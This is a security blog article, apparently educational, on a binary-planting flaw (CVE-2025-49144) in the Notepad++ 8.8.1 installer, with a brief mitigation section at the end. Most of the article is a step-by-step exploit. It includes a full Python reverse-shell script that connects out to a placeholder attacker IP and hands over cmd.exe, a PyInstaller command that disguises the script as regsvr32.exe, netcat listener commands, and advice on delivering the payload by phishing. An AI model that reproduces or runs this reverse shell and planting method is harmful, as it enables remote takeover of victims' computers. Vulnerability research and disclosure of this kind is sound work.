Disclaimer: The information provided in this article is just for an educational and informational purposes only. The intent behind discussing hacking techniques, tools, and concepts is not to encourage or endorse any illegal activities.

Yes, you heard it absolutely correct. A potential critical vulnerability has been discovered in Notepad++ v8.8.1 which was released on 5th May 2025. It affects millions of users worldwide giving their system level access.

The vulnerability is tracked as CVE-2025-49144 which enables an attacker to gain System level privileges by manipulating the location of an executable file named regsvr32.exe.

In this article we will be discussing the reason behind this vulnerability, how to exploit it and what are the possible consequences.

Root Cause of the Vulnerability:

The vulnerability comes from uncontrolled EXE search path in Notepad++ installation file. When we execute the installation file, it searches for the executable dependencies and one of them is regsvr32.exe. It is searching this file in current directory (Directory in which the installation file exists) without making any verification.

Now, here attacker can place malicious executable file with the name regsvr32.exe and installer gets tricked into executing that malicious file placed by an attacker which leads to binary planting.

This allows an attacker to execute arbitrary code, potentially leading to a reverse shell or full system compromise.

Let’s understand first how attack can be performed:

Step 1: Create a malicious file and save it as regsvr32.py

Note: You have to change your IP address and Port (If required).

import socket
import os
import threading
import subprocess as sp
ip_addr = '<ATTACKER_IP_ADDRESS>'
port = 4444
# Set up the subprocess to run cmd.exe
p = sp.Popen(['cmd.exe'], stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.STDOUT)
# Create a socket and connect to the specified address and port
s = socket.socket()
s.connect((ip_addr, port))
# Define the function to read from the subprocess stdout and send to the socket
def read_and_send():
    while True:
        o = os.read(p.stdout.fileno(), 1024)
        s.send(o)
# Define the function to receive from the socket and write to the subprocess stdin
def recv_and_write():
    while True:
        i = s.recv(1024)
        os.write(p.stdin.fileno(), i)
# Start the threads to run the above functions
threading.Thread(target=read_and_send, daemon=True).start()
threading.Thread(target=recv_and_write).start()

Step 2: Now, execute the following command to convert it to exe file. After executing this command you will see that regsvr32.exe is created inside dist folder.

python -m PyInstaller --onefile regsvr32.py

Note: Make sure regsvr32.exe and installation file for notepad++ is in the same directory.

Step 3: Setup listener using netcat on your attacker machine. You have to use the same port for listener which you provided in malicious file.

Note: To successfully run this command you need to install netcat.

For Linux:

nc -nvlp <PORT_NUMBER>

For windows:

ncat -nvlp <PORT_NUMBER>

Step 4: Execute Notepad++ installation file npp.8.8.1.Installer.x64.exe

Here continue your installation normally and at last step where the installer is extracting all the files you will see that one of the file regsvr32.exe will get executed and you will receive a connection in your attacker machine.

In Process Monitor we can clearly see that installer is searching for the regsvr32.exe in Downloads directory.

Note: Although it says CreateFile but it doesn’t always create a file, it can also open an existing file.

Here, you can see in the below image after successful execution of a malicious file, a reverse shell was established successfully, which provides command line access to the victim machine.

Security Implications

This vulnerability can be exploited by combining it with phishing attack, where the attacker tricks the victim into downloading a zip file having installer and malicious file. And while installation of this application, installer’s uncontrolled search path allows an attacker to execute malicious file which leads to arbitrary code execution and potentially a reverse shell, giving the attacker a full control over the victim machine. Combining phishing with this vulnerability can significantly increase the risk of this attack.

Possible Measures

1. Use Absolute paths: To find executable dependencies, instead of using current working directory it should use absolute paths like C:\Windows\System32
2. Verify integrity: The installer should verify the digital signature of the files before executing them to confirm that they have not been tampered with.
3. Avoid Untrusted paths: Avoid loading any dependencies from untrusted directories especially from user writable directories.

Thanks for reading